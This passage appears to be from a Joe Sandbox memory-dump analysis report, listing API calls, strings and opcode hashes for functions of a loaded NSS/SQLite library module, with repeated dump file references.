Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: ad12aa0a7f1b2e1dbe01b9a15285c85cf8d681454abe611d41eed9443f0097e9
Instruction ID: 66b8695c5f60486ea172a52892cbea05a8bf1602d910ef5d0499d69159a1f4aa
Opcode Fuzzy Hash: ad12aa0a7f1b2e1dbe01b9a15285c85cf8d681454abe611d41eed9443f0097e9
Instruction Fuzzy Hash: 59313B72B0DA109BEF109A35DA8CB4737BC9B1335CFA18534E92497740E3349609CBE1

Function 6C792E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C792F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C792FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C793005
memcpy.VCRUNTIME140(?,?,?), ref: 6C7930EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C793131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C793178

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C793022, 6C793156, 6C793162, 6C79318A, 6C793196, 6C7931A2, 6C7931AE, 6C7931BA, 6C7931C6
%s at line %d of [%.10s], xrefs: 6C793171
database corruption, xrefs: 6C79316C

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: 0d50a52a4d5d52401c119b4cbc051536228679551918e9c0dc1442df2cddf3a5
Instruction ID: 1af7691ad75d44ea3611b53a6be2e1dd3f1cd4f5ce99955bd68dbb0719387eee
Opcode Fuzzy Hash: 0d50a52a4d5d52401c119b4cbc051536228679551918e9c0dc1442df2cddf3a5
Instruction Fuzzy Hash: 93B1BF70E45629DBCB18CF9DD984AEEB7B2BF48304F144029E849B7B51D3759941CBA0

Function 6C772400 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6C7724EC
sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6C772315), ref: 6C77254F
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6C772315), ref: 6C77256C

Strings

API called with finalized prepared statement, xrefs: 6C772543, 6C77254D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7724F4, 6C772557
misuse, xrefs: 6C772561
API called with NULL prepared statement, xrefs: 6C77253C
%s at line %d of [%.10s], xrefs: 6C772566
bind on a busy prepared statement: [%s], xrefs: 6C7724E6

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
API String ID: 632333372-2222229625
Opcode ID: ee08bbf31a988de8576b175ff5d043e6e10d9eef41a4030b9c3a39c094ef83e6
Instruction ID: 1583808d05e2d86c07599ac27eabb23c8064300629620da2727d3363eeea9991
Opcode Fuzzy Hash: ee08bbf31a988de8576b175ff5d043e6e10d9eef41a4030b9c3a39c094ef83e6
Instruction Fuzzy Hash: 33410271604608CBEB34CF28D99CB6673B6AF81319F24497CE8654FB40D736E825C7A1

Function 6C826C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C826C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C826C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C826CA3

Part of subcall function 6C90D930: PL_strncpyz.NSS3(?,?,?), ref: 6C90D963

PR_LogPrint.NSS3(?,00000000), ref: 6C826CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C826CD5

Strings

C_DigestInit, xrefs: 6C826C61
hSession = 0x%x, xrefs: 6C826C7E, 6C826C8E
(CK_INVALID_HANDLE), xrefs: 6C826C9C
pMechanism = 0x%p, xrefs: 6C826CD0

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: 1797462394fe35ab5118f58ac28b8523e2f725c49f74dfc49531f09c3384da83
Instruction ID: 4e69e4f4f6d9502bac8101b99f0dd7c1f1eeb3fd9eb1103b03f44b7b638359bb
Opcode Fuzzy Hash: 1797462394fe35ab5118f58ac28b8523e2f725c49f74dfc49531f09c3384da83
Instruction Fuzzy Hash: B92139317051089BC7109F689E4DF5B37B5EB5231DF954429E40997B01DB38C948C7D1

Function 6C7F0F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C7F0F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C7F0F84

Part of subcall function 6C84B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9218D0,?), ref: 6C84B095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C80F59B,6C91890C,?), ref: 6C7F0FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C7F0FC1

Part of subcall function 6C850BE0: malloc.MOZGLUE(6C848D2D,?,00000000,?), ref: 6C850BF8
Part of subcall function 6C850BE0: TlsGetValue.KERNEL32(6C848D2D,?,00000000,?), ref: 6C850C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C7F0FDB
PR_CallOnce.NSS3(6C952AA4,6C8512D0), ref: 6C7F0FEF
PL_FreeArenaPool.NSS3(?), ref: 6C7F1001
PL_FinishArenaPool.NSS3(?), ref: 6C7F1009

Strings

security, xrefs: 6C7F0F5C

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: 312fa8aa040a652268d6458854bbf0cb41b4e2fae8064b5c92f85c18df2434ef
Instruction ID: 6e18c3330939708a7c29bf603a8e63cfd41b237f133ffadeaecb8e9ae6f8b8f5
Opcode Fuzzy Hash: 312fa8aa040a652268d6458854bbf0cb41b4e2fae8064b5c92f85c18df2434ef
Instruction Fuzzy Hash: 552106B1904204ABEB109F29DE81ABFB7B4EF8465DF048929FC1897701F731D516CB92

Function 6C7F6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C7F7D8F,6C7F7D8F,?,?), ref: 6C7F6DC8

Part of subcall function 6C84FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C84FE08
Part of subcall function 6C84FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C84FE1D
Part of subcall function 6C84FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C84FE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C7F7D8F,?,?), ref: 6C7F6DD5

Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C8510F3
Part of subcall function 6C8510C0: EnterCriticalSection.KERNEL32(?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85110C
Part of subcall function 6C8510C0: PL_ArenaAllocate.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851141
Part of subcall function 6C8510C0: PR_Unlock.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851182
Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C918FA0,00000000,?,?,?,?,6C7F7D8F,?,?), ref: 6C7F6DF7

Part of subcall function 6C84B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9218D0,?), ref: 6C84B095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C7F6E35

Part of subcall function 6C84FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C84FE29
Part of subcall function 6C84FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C84FE3D
Part of subcall function 6C84FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C84FE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C7F6E4C

Part of subcall function 6C8510C0: PL_ArenaAllocate.NSS3(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C918FE0,00000000), ref: 6C7F6E82

Part of subcall function 6C7F6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C7FB21D,00000000,00000000,6C7FB219,?,6C7F6BFB,00000000,?,00000000,00000000,?,?,?,6C7FB21D), ref: 6C7F6B01
Part of subcall function 6C7F6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C7F6B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C7F6F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C7F6F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C918FE0,00000000), ref: 6C7F6F6B
PR_SetError.NSS3(FFFFE005,00000000,6C7F7D8F,?,?), ref: 6C7F6FE1

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 772475dba1a9822a5a88ef6cf1d66f75139e14cdb27b5e971b357c54cccd2648
Instruction ID: 58f8f32e1df990d484088ad262e9acb268c37bb70e743bf804ddc871074e5ba7
Opcode Fuzzy Hash: 772475dba1a9822a5a88ef6cf1d66f75139e14cdb27b5e971b357c54cccd2648
Instruction Fuzzy Hash: 04718271D106469FEB00CF15CE80BAABBA4BF95308F154239E828D7B11F770EA95CB91

Function 6C830FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C831057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C831085
PK11_GetAllTokens.NSS3 ref: 6C8310B1
free.MOZGLUE(?), ref: 6C831107
PR_SetError.NSS3(00000000,00000000), ref: 6C831172
free.MOZGLUE(?), ref: 6C831182
free.MOZGLUE(?), ref: 6C8311A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C8311C5

Part of subcall function 6C8352C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C80EAC5,00000001), ref: 6C8352DF
Part of subcall function 6C8352C0: EnterCriticalSection.KERNEL32(?), ref: 6C8352F3
Part of subcall function 6C8352C0: PR_Unlock.NSS3(?), ref: 6C835358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C8311D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C8311F3

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: fdf7199a91be15468a70a48706f5dd3eaf9ba5adcc4d7b60206746eb3e2aa0dd
Instruction ID: ecbd70f04a81949f93af9e866704991475be450ea1e2874c5c122efe97e16d96
Opcode Fuzzy Hash: fdf7199a91be15468a70a48706f5dd3eaf9ba5adcc4d7b60206746eb3e2aa0dd
Instruction Fuzzy Hash: 3C61A5B0E043559BEB10DFA8D981BAEB7B4AF04748F146928EC1DAB741E731E944CBD1

Function 6C83ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C81CDBB,?,6C81D079,00000000,00000001), ref: 6C83AE10
EnterCriticalSection.KERNEL32(?,?,6C81CDBB,?,6C81D079,00000000,00000001), ref: 6C83AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C81D079,00000000,00000001), ref: 6C83AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C81CDBB,?,6C81D079,00000000,00000001), ref: 6C83AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C81CDBB,?,6C81D079,00000000,00000001), ref: 6C83AE7F
TlsGetValue.KERNEL32(?,6C81CDBB,?,6C81D079,00000000,00000001), ref: 6C83AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C81CDBB,?,6C81D079,00000000,00000001), ref: 6C83AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C81CDBB,?,6C81D079,00000000,00000001), ref: 6C83AEF1
free.MOZGLUE(6C81CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C81CDBB,?), ref: 6C83AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C81CDBB,?,6C81D079,00000000,00000001), ref: 6C83AF30

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 620ca5521e1810109c5a97ac943e9519d417c36ad2972e5229902e0310b98301
Instruction ID: 2569c34aeb27aff7d539f8fed37b7a312881919b0f3fa77702bbf4415b7b0afd
Opcode Fuzzy Hash: 620ca5521e1810109c5a97ac943e9519d417c36ad2972e5229902e0310b98301
Instruction Fuzzy Hash: 1C51CFB1A04611AFDF10DFA9C984A96B7B4FF08319F146A64D80C97A51E731F864CBD1

Function 6C814CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C81AB7F,?,00000000,?), ref: 6C814CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C81AB7F,?,00000000,?), ref: 6C814CC8
TlsGetValue.KERNEL32(?,6C81AB7F,?,00000000,?), ref: 6C814CE0
EnterCriticalSection.KERNEL32(?,?,6C81AB7F,?,00000000,?), ref: 6C814CF4
PL_HashTableLookup.NSS3(?,?,?,6C81AB7F,?,00000000,?), ref: 6C814D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C814D10

Part of subcall function 6C89DD70: TlsGetValue.KERNEL32 ref: 6C89DD8C
Part of subcall function 6C89DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C89DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C814D26

Part of subcall function 6C8B9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C900A27), ref: 6C8B9DC6
Part of subcall function 6C8B9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C900A27), ref: 6C8B9DD1
Part of subcall function 6C8B9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8B9DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C814D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C814DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C814E02

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 33179e02f42c96a632b09bbdfe975f3fa2cf20a4d0ec4566477e5141dd708b2c
Instruction ID: 8079036173a42b38cbb09b6966faa1ca89d9a6dc7a77ca829d857fb603e29690
Opcode Fuzzy Hash: 33179e02f42c96a632b09bbdfe975f3fa2cf20a4d0ec4566477e5141dd708b2c
Instruction Fuzzy Hash: BD41B7B5A042069FDF206F28EE4496677F8EF8521EF154970EC0887B12EB31D918C7D1

Function 6C7F2E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C7F2CDA,?,00000000), ref: 6C7F2E1E

Part of subcall function 6C84FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C7F9003,?), ref: 6C84FD91
Part of subcall function 6C84FD80: PORT_Alloc_Util.NSS3(A4686C85,?), ref: 6C84FDA2
Part of subcall function 6C84FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C85,?,?), ref: 6C84FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C7F2E33

Part of subcall function 6C84FD80: free.MOZGLUE(00000000,?,?), ref: 6C84FDD1

TlsGetValue.KERNEL32 ref: 6C7F2E4E
EnterCriticalSection.KERNEL32(?), ref: 6C7F2E5E
PL_HashTableLookup.NSS3(?), ref: 6C7F2E71
PL_HashTableRemove.NSS3(?), ref: 6C7F2E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C7F2E96
PR_Unlock.NSS3 ref: 6C7F2EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7F2EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7F2EC5

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 56eff45f96ff14b2995a52caeb4a29e413d69be942e60b0489fc073cba943ac6
Instruction ID: b7be547e452b56b1dbbc24b3b34bc18d0a9a2bead2d21bf0ccc837d356649a4e
Opcode Fuzzy Hash: 56eff45f96ff14b2995a52caeb4a29e413d69be942e60b0489fc073cba943ac6
Instruction Fuzzy Hash: F6213B72E04105ABEF102B78DE4DADB3B78EB5230DF644534ED2886711FB32D569C6A1

Function 6C77CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C77B999), ref: 6C77CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C77B999), ref: 6C77D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C77B999), ref: 6C77D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C77B999), ref: 6C8C972B

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C77CFDD, 6C77D00E, 6C77D022, 6C77D033, 6C8C9780
%s at line %d of [%.10s], xrefs: 6C77CFEC, 6C77D018, 6C77D029, 6C77D03F, 6C8C978B
database corruption, xrefs: 6C77CFE7, 6C77D013, 6C77D028, 6C77D039, 6C77D03E, 6C8C9786

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 1fe5c4a8a34c695ebfe321292d5f12093970ed97c0699ff9b42a1e41ce2c37c6
Instruction ID: de8fb8a5e160be961e56648d165fcaf448922e84d11c14a91b2a0d8dc4c09ee2
Opcode Fuzzy Hash: 1fe5c4a8a34c695ebfe321292d5f12093970ed97c0699ff9b42a1e41ce2c37c6
Instruction Fuzzy Hash: 7E617A71A042148BD720CF29C900BA7B7F5EF95318F2845ADE4489FB82D376D847C7A1

Function 6C87EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C89A4A1,?,00000000,?,00000001), ref: 6C87EF6D

Part of subcall function 6C89C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C89C2BF

htonl.WSOCK32(00000000,?,6C89A4A1,?,00000000,?,00000001), ref: 6C87EFE4
htonl.WSOCK32(?,00000000,?,6C89A4A1,?,00000000,?,00000001), ref: 6C87EFF1
